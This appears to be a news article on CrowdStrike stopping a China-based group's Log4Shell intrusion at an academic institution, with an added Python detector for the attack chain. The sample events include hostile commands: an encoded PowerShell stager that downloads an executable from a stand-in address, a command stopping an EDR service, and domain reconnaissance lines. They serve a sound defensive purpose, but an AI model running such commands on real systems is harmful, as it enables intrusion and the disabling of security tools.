Security firm CrowdStrike has disrupted an attempted intrusion into a large academic institution by a China-based group that exploited the Log4j vulnerability.
CrowdStrike dubbed the group “Aquatic Panda” and said it is a “group with a dual mission of intelligence gathering and industrial espionage” that has been operating since at least May 2020.
The objective of this particular intrusion is unknown because the attack was halted, but CrowdStrike told ZDNet that Aquatic Panda is known to use tools that let it maintain persistence in victim environments in order to reach intellectual property and other industrial trade secrets.
“Aquatic Panda’s operations have mainly focused on entities in the telecommunications, technology and government sectors. Aquatic Panda relies heavily on Cobalt Strike, and its toolkit includes a unique Cobalt Strike loader known under the name FishMaster. Aquatic Panda has also been observed delivering njRAT malware to targets,” the company said in a report.
According to CrowdStrike, its team discovered “suspicious activity originating from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, which led to the termination of an active intrusion.”
Log4Shell added to the toolkit
After observing the group and reviewing the telemetry, CrowdStrike believes that a modified version of the Log4j exploit was likely used during the group’s operations.
The CrowdStrike team found that the group used a public GitHub project dated December 13, 2021 to gain access to the vulnerable VMware Horizon instance.
“Aquatic Panda continued its reconnaissance from the host, using native operating system binaries to understand current privilege levels as well as system and domain details. OverWatch analysts also observed an attempt to discover and stop a third-party Endpoint Detection and Response (EDR) service. OverWatch continued to track the malicious actor’s behavior, who downloaded additional scripts and then executed a Base64-encoded command through PowerShell to retrieve malware from its toolkit,” the company explains.
“Throughout the intrusion, OverWatch closely monitored the attacker’s activity in order to provide ongoing updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement its incident response protocol, which ultimately patched the vulnerable application and prevented further activity by the attacker on the host.”
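The chain CrowdStrike describes (a Horizon Tomcat process spawning a shell, native recon binaries, an attempt to stop an EDR service, then Base64-encoded PowerShell pulling a payload) is detectable from ordinary process-creation telemetry. The following is an added example of that detection logic, written for this page and not CrowdStrike’s or OverWatch’s code. The event records, the `ExampleEDRService` service name and the `198.51.100.7` staging address are constructed for the demo; the parent-process and recon-binary lists are assumptions to tune for your own environment.

```python
"""Detect the Log4Shell-on-Horizon intrusion pattern from process-creation events.

Added example, not CrowdStrike's code. Events, service name and URL are constructed.
"""
from __future__ import annotations

import base64
import re

# Parent processes that should never spawn shells or recon tooling. ws_TomcatService.exe is
# the Horizon Connection Server's Tomcat wrapper; the rest are assumptions for other Java web tiers.
WEB_TIER_PARENTS = {"ws_tomcatservice.exe", "tomcat9.exe", "java.exe"}

# Native binaries used to learn "privilege levels as well as system and domain details".
RECON_BINARIES = {"whoami.exe", "systeminfo.exe", "nltest.exe", "net.exe", "net1.exe",
                  "ipconfig.exe", "hostname.exe", "quser.exe", "tasklist.exe"}

# Hypothetical EDR service name (constructed); replace with what your agent registers.
PROTECTED_SERVICES = {"exampleedrservice"}

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
DOWNLOADER_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)


def tokenize(command_line: str) -> list[str]:
    """Split a Windows command line into arguments, keeping quoted paths intact."""
    return [t.strip('"') for t in TOKEN_RE.findall(command_line)]


def is_encoded_command_flag(token: str) -> bool:
    """powershell.exe accepts -EncodedCommand, any prefix of it (-e, -en, -enc, ...) and the alias -ec."""
    if not token.startswith(("-", "/")):
        return False
    flag = token.lower().lstrip("-/")
    return bool(flag) and (flag == "ec" or "encodedcommand".startswith(flag))


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(tokens: list[str]) -> str | None:
    """Return the decoded script if the command line carries an encoded command, else None.
    Malformed payloads (bad Base64, odd byte count) are reported rather than crashing the pipeline."""
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_flag(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return "<undecodable payload>"
    return None


def service_stop_target(image: str, tokens: list[str]) -> str | None:
    """Name of the service targeted by `sc stop X`, `net stop X` or `Stop-Service [-Name] X`, if any."""
    low = [t.lower() for t in tokens]
    if image in ("sc.exe", "net.exe", "net1.exe") and "stop" in low:
        idx = low.index("stop")
        return tokens[idx + 1] if idx + 1 < len(tokens) else None
    if "stop-service" in low:
        rest = [t for t in tokens[low.index("stop-service") + 1:] if not t.startswith("-")]
        return rest[0] if rest else None
    return None


def analyze_event(event: dict) -> list[str]:
    """Return the detection labels that fire for one process-creation event."""
    findings: list[str] = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    tokens = tokenize(event["command_line"])

    if parent in WEB_TIER_PARENTS and image in RECON_BINARIES | {"cmd.exe", "powershell.exe", "pwsh.exe"}:
        findings.append("web_tier_spawned_shell_or_recon")
    if image in RECON_BINARIES:
        findings.append("host_or_domain_recon")
    svc = service_stop_target(image, tokens)
    if svc and svc.lower() in PROTECTED_SERVICES:
        findings.append(f"edr_service_stop:{svc}")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(tokens)
        if decoded is not None:
            findings.append("encoded_powershell")
            if DOWNLOADER_RE.search(decoded):
                findings.append("encoded_powershell_downloader")
    return findings


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Run every event through the detections; keys are event ids."""
    return {e["id"]: analyze_event(e) for e in events}


# Constructed stager: RFC 5737 TEST-NET-2 address, not a real host.
STAGER = "(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/stage.bin','C:\\Windows\\Temp\\stage.exe')"
HORIZON_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
SAMPLE_EVENTS = [  # constructed, modelled on the chain described in the article
    {"id": 1, "parent_image": HORIZON_TOMCAT, "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami /all"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\whoami.exe", "command_line": "whoami /all"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\nltest.exe", "command_line": "nltest /domain_trusts"},
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\sc.exe", "command_line": "sc stop ExampleEDRService"},
    {"id": 5, "parent_image": HORIZON_TOMCAT, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)},
    {"id": 6, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for event_id, labels in triage(SAMPLE_EVENTS).items():
        print(event_id, labels or "-")
```

The high-signal rule is the first one: on a Horizon Connection Server the Tomcat wrapper has no business launching `cmd.exe` or `powershell.exe` at all, so that alone would have surfaced the intrusion before any recon or EDR tampering. Decoding the `-EncodedCommand` payload (UTF-16LE under the Base64, not UTF-8) is what lets the analyst see the download-and-execute intent rather than an opaque blob.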
CrowdStrike officials told ZDNet they see a range of groups inside and outside China taking advantage of the Log4j vulnerability, from advanced cyber espionage groups to more mainstream cybercrime groups.
“Ultimately, the viability of this exploit is well proven, with a substantial attack surface still present. We will continue to see actors use this vulnerability until all recommended mitigation measures are in place,” they said in an interview.
Vulnerabilities not to be taken lightly
Last week, the US, UK, Australia and other countries published a joint advisory on Log4j in response to “active and global exploitation by numerous malicious actors.”
Numerous groups in North Korea, Iran, Turkey and China have been seen exploiting the vulnerability, alongside a number of ransomware groups.
According to Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), the Log4j vulnerabilities pose a serious and ongoing threat to organizations and governments around the world.
“We implore all entities to take immediate action to implement the latest guidelines to protect their networks,” Easterly said. “These vulnerabilities are the most severe I have seen in my career, and it is imperative that we work together to keep our networks secure.”